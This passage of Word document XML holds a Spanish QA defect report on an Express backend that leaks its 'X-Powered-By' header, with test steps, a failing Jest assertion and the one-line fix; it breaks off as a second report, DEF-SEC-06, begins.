              <w:t xml:space="preserve">Reporte de Defecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Código</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardware y software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PC, 16GB RAM, Intel Core i5 · Node.js 20 · Jest v29 + Supertest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sistema operativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Navegador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Google Chrome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resolución</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1920x1080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Comentarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Detectado en TC-SEC-09 — Seguridad OWASP A05 (Configuración de Seguridad)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nombre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Header X-Powered-By: Express expuesto — Information Leakage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Express agrega por defecto el header X-Powered-By: Express en todas las respuestas HTTP, revelando el stack tecnológico al atacante y facilitando ataques dirigidos a vulnerabilidades conocidas de Express.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Encargado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Andrés Gustavo Arias Ruiz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Prioridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Baja</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Precondiciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Backend corriendo.
2. Usuario autenticado con JWT válido.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pasos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. GET /profile con Authorization: Bearer {token}.
2. Inspeccionar headers de respuesta HTTP.
3. Verificar presencia de X-Powered-By.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado esperado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Header X-Powered-By ausente en la respuesta.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado obtenido</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Header X-Powered-By: Express presente en todas las respuestas. Test [DEF-SEC-05] FALLA: expect(headers["x-powered-by"]).toBeUndefined() — valor actual: "Express".</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Notas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Causa raíz: backend/app.js no llama a app.disable("x-powered-by").
Correción: Agregar app.disable("x-powered-by"); después de const app = express(); o instalar helmet: app.use(require("helmet")());</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="C55A11" w:sz="6"/>
          <w:left w:val="single" w:color="C55A11" w:sz="6"/>
          <w:bottom w:val="single" w:color="C55A11" w:sz="6"/>
          <w:right w:val="single" w:color="C55A11" w:sz="6"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="C55A11" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporte de Defecto: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporte de Defecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Código</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
